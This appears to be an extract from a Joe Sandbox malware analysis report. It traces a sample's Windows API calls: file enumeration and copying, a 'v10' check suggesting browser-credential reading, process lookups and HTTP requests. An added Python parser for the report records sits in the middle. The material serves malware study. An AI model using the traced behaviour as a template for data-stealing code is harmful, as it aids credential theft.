  • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
• lstrcatA.KERNEL32(?,00000000,?,00000104,00000000,?), ref: 003542E8
• lstrcatA.KERNEL32(?), ref: 00354303
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354005
  • Part of subcall function 00353FEA: FindFirstFileA.KERNEL32(?,?), ref: 0035401C
  • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E258), ref: 00354049
  • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E254), ref: 00354063
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354083
  • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E266), ref: 00354090
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540AD
  • Part of subcall function 00353FEA: PathMatchSpecA.SHLWAPI(?,?), ref: 003540D0
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?,000003E8), ref: 003540FC
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 0035410A
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035411A
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 00354128
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035413C
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540BD
  • Part of subcall function 00353FEA: CopyFileA.KERNEL32(?,00000000,00000001), ref: 003541D4
  • Part of subcall function 00353FEA: DeleteFileA.KERNEL32(00000000), ref: 00354241
  • Part of subcall function 00353FEA: FindNextFileA.KERNEL32(?,?), ref: 0035428B
  • Part of subcall function 00353FEA: FindClose.KERNEL32(?), ref: 0035429C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
• String ID: f5
• API String ID: 2104210347-2543225189
• Opcode ID: c900fdb011209fe25d7d6a5f69dcf1a42ddf3ed7ecfbff5f705d62031e872442
• Instruction ID: 3310d6d4c35ee7e4eb7a140687d66127a0edd23677f33c93ef0d5c6d6359259f
• Opcode Fuzzy Hash: c900fdb011209fe25d7d6a5f69dcf1a42ddf3ed7ecfbff5f705d62031e872442
• Instruction Fuzzy Hash: E83190B1D0051DBBCF16FFB0DC47CE93BBDEB08341F004955F9489A064EA7296998BA1
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 00346BB0: memcmp.MSVCRT(?,v10,00000003,0035E264,0035E266,?), ref: 00346BCF
  • Part of subcall function 00346BB0: memset.MSVCRT ref: 00346C00
  • Part of subcall function 00346BB0: LocalAlloc.KERNEL32(00000040,?), ref: 00346C35
• lstrlenA.KERNEL32(00000000), ref: 00347FF4
• lstrlenA.KERNEL32(00000000), ref: 00348008
Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 4023347672-2543225189
                                                                                                                                                                                      • Opcode ID: be31d5f3b30176588c5040bda96f39cbbfcdb3f26a69770241fd0586d0d4a09b
                                                                                                                                                                                      • Instruction ID: 3dc95c850f4dd4096371a2f1d492c2cdea2ec1042a1d4d7b198b95c0919268b2
                                                                                                                                                                                      • Opcode Fuzzy Hash: be31d5f3b30176588c5040bda96f39cbbfcdb3f26a69770241fd0586d0d4a09b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E1A971804008AADB16FBA4DC92DEE77B8BF25304F5145A5F416BE0A1EF34BB49CB54
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034759C
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 003475B0
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 3799617333-2543225189
                                                                                                                                                                                      • Opcode ID: e28f1c164020d4375b91ddbfa0be332c4089e5b60b0f08ca9d1eacb7d988a3e0
                                                                                                                                                                                      • Instruction ID: 421746b51201c6de12093e1c58b099a074732b775b1d5bc12f91bcdfb34a6941
                                                                                                                                                                                      • Opcode Fuzzy Hash: e28f1c164020d4375b91ddbfa0be332c4089e5b60b0f08ca9d1eacb7d988a3e0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C81A672804108AADF06FBE4DD96CEE77B8BF25315F510565F402BE0A1EF24BA09CB65
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347812
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347826
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 3799617333-2543225189
                                                                                                                                                                                      • Opcode ID: bff30578bec40ad150d66ac85f86662635409e335b8c7bf9a95c64beebfb9310
                                                                                                                                                                                      • Instruction ID: 81a5a88e48443e5d7d86e034d2760f83daf86c04356ae05be5510c2424de845b
                                                                                                                                                                                      • Opcode Fuzzy Hash: bff30578bec40ad150d66ac85f86662635409e335b8c7bf9a95c64beebfb9310
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2561A472804109ABDF06FBE4DD96CEE77B8BF25315B510565F402BE0A1EF24BA09CB61
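The function records above are machine-generated and repetitive, and the detail worth pulling out of them (which subcall spawns a thread and then blocks on it, and which records share an API String ID) is easy to miss by eye. The parser below is an added example, not Joe Sandbox code: it reads the flattened record layout shown on this page from a constructed sample built from the same lines, splits each API line into API name, module, arguments, call-site address and parent subcall, and flags a CreateThread followed by WaitForSingleObject in the same subcall, decoding the timeout argument (000003E8, i.e. 1000 ms, in subcall 003526F8). The record field names, the "Download File" suffix it strips from "Associated" lines, and the sample text are taken from this page; the function and class names are the example's own.

```python
"""Parse flattened Joe Sandbox function-analysis records and flag the
CreateThread -> WaitForSingleObject pattern (added example, not Joe Sandbox code)."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: two trimmed records in the report's flattened layout.
# The "Download File" suffix reproduces the link residue on "Associated" lines.
SAMPLE = """\
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• lstrlenA.KERNEL32(00000000), ref: 0034759C
  • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
  • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
  • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
• String ID: f5
• API String ID: 3799617333-2543225189
• Instruction Fuzzy Hash: 1C81A672804108AADF06FBE4DD96CEE77B8BF25315F510565F402BE0A1EF24BA09CB65
APIs
• lstrlenA.KERNEL32(00000000), ref: 00347FF4
  • Part of subcall function 00346BB0: memset.MSVCRT ref: 00346C00
  • Part of subcall function 00346BB0: LocalAlloc.KERNEL32(00000040,?), ref: 00346C35
Similarity
• API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
• String ID: f5
• API String ID: 4023347672-2543225189
• Instruction Fuzzy Hash: 72E1A971804008AADB16FBA4DC92DEE77B8BF25304F5145A5F416BE0A1EF34BB49CB54
"""


@dataclass
class ApiCall:
    api: str                 # e.g. "WaitForSingleObject"
    module: str              # e.g. "KERNEL32"
    args: list[str]          # argument tokens exactly as printed ("?" = unknown)
    ref: str                 # call-site address
    subcall: str | None      # parent function when listed as "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    associated: list[str] = field(default_factory=list)   # associated dump files
    fields: dict[str, str] = field(default_factory=dict)  # remaining "Key: value" lines


# "• [Part of subcall function X: ]api.MODULE[(args)], ref: ADDR"
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_.-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# Generic "• Key: value" line (Source File, API ID, Instruction Fuzzy Hash, ...)
_FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the flattened report text into one record per 'APIs' heading."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = _API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            cur.apis.append(ApiCall(m.group("api"), m.group("mod"), args,
                                    m.group("ref").upper(), m.group("sub")))
            continue
        m = _FIELD_RE.match(line)
        if m:
            key, val = m.group("key"), re.sub(r"Download File$", "", m.group("val")).strip()
            if key == "Associated":
                cur.associated.append(val)
            else:
                cur.fields[key] = val
    return records


def thread_wait_pattern(rec: FunctionRecord) -> tuple[str, int] | None:
    """Return (CreateThread call site, wait timeout in ms) when the same subcall
    creates a thread and then blocks on a handle with WaitForSingleObject."""
    create_refs: dict[str | None, str] = {}
    for call in rec.apis:
        if call.api == "CreateThread":
            create_refs[call.subcall] = call.ref
        elif (call.api == "WaitForSingleObject" and call.subcall in create_refs
              and len(call.args) >= 2 and call.args[1] != "?"):
            return create_refs[call.subcall], int(call.args[1], 16)
    return None


def group_by_api_string_id(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """Map each API String ID to the instruction fuzzy hashes of records carrying it."""
    groups: dict[str, list[str]] = defaultdict(list)
    for rec in records:
        key = rec.fields.get("API String ID")
        if key:
            groups[key].append(rec.fields.get("Instruction Fuzzy Hash", ""))
    return dict(groups)


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, rec.fields.get("API String ID"), thread_wait_pattern(rec))
```

Run against a full report export, `group_by_api_string_id` lets you cluster the many near-identical string-building functions (same API String ID, differing only in fuzzy hash) so that the one record with the thread-and-wait subcall stands out.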
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: mallocmemset
• String ID:
• API String ID: 2882185209-0
APIs
• CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,0035E264,0035E266,?,?,003510DC,?), ref: 0034FCD0
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,003510DC,?), ref: 0034FCF7
• CloseHandle.KERNEL32(00000000,?,?,003510DC,?), ref: 0034FD0E
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID:
• API String ID: 1065093856-0
APIs
• OpenProcess.KERNEL32(00000410,00000000,?,003613FC), ref: 0034FB2C
• K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0034FB47
• CloseHandle.KERNEL32(00000000), ref: 0034FB4E
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: CloseFileHandleModuleNameOpenProcess
• String ID:
• API String ID: 3183270410-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: FileRead
• String ID: winRead
• API String ID: 2738559852-2759563040
APIs
• VirtualProtect.KERNEL32(?,?,?,?,?,00000000,?,?,003466AF), ref: 003465FF
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-3916222277
• Opcode ID: f96d5b8b654dcac285299f74dbbb5d21e086e5de928c881c3396ff82a807e84c
• Instruction ID: 295bc0c855158f337e6b156ce38467bd8c32dd0288616e9884aead2db2a7f0d3
• Opcode Fuzzy Hash: f96d5b8b654dcac285299f74dbbb5d21e086e5de928c881c3396ff82a807e84c
• Instruction Fuzzy Hash: 5111BCB1100609EAEF22CF94CA867E8B7E8FB06340F214499E542DA284C734FE45DB56
APIs
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 0034502A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034507A
  • Part of subcall function 0034502A: StrCmpCA.SHLWAPI(?), ref: 0034508E
  • Part of subcall function 0034502A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003450B1
  • Part of subcall function 0034502A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 003450E7
  • Part of subcall function 0034502A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0034510B
  • Part of subcall function 0034502A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00345116
  • Part of subcall function 0034502A: HttpQueryInfoA.WININET(00000000,00000013,?,00000000), ref: 00345134
• StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,ERROR,00351FD9), ref: 003514B2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
• String ID: ERROR
• API String ID: 3086566538-2861137601
• Opcode ID: 22d66874afdf391594fdd7cc9a122f689ad0735f406a6264e65720e38929d370
• Instruction ID: b5d1912c23596e362f4b76cc2182a8202725d6ecac8849d6e8698ae1d29917b8
• Opcode Fuzzy Hash: 22d66874afdf391594fdd7cc9a122f689ad0735f406a6264e65720e38929d370
• Instruction Fuzzy Hash: 65011775900108ABCB16FFB5D8969DD37A8BE01354F408164F9169F192FF30FA08C691
APIs
• GetSystemInfo.KERNEL32(?,?,61ECC400,?,61E35248), ref: 61E354EB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: InfoSystem
• String ID: HRa
• API String ID: 31276548-1004199025
• Opcode ID: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
• Instruction ID: 06cda1940385b8855eb11c4b22b944da250b3e82bd825487f891a332eec36e05
• Opcode Fuzzy Hash: 90f829b77809e80cd7cc556866e5c439b2c19dcd8d7a36888ffec522c66ecd4c
• Instruction Fuzzy Hash: 56F03AB02083419BD704AFA4C60631FBAF5AFC6B09F66C82DD1858B380CB75D8559B93
APIs
• SHFileOperationA.SHELL32(?), ref: 0034FDEB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: FileOperation
• String ID: f5
• API String ID: 3080627654-2543225189
• Opcode ID: c1867e088241fed4b314ca05164727c504e8ab4005a0d5dd68e3481bf4dd661e
• Instruction ID: ad76ec83c362ee293fdf4d452ba6ad6e1dd815dcc770e42d9a98b51c7240d48d
• Opcode Fuzzy Hash: c1867e088241fed4b314ca05164727c504e8ab4005a0d5dd68e3481bf4dd661e
